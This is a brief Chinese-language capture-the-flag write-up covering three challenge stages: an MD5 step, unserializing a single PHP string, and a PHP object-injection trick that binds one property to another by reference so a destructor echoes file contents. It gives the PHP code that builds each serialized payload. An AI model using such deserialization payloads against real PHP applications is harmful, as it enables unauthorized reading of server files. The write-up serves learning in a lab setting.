一共有三小关
第一关:md5加密
第二关:反序列化
重点 单个字符串序列化 unserialize($str) === "$KEY"
php
<?php
$KEY="YES I love";
echo serialize($KEY);
s:10:"YES I love";
第三关: 反序列化
把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。
php
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);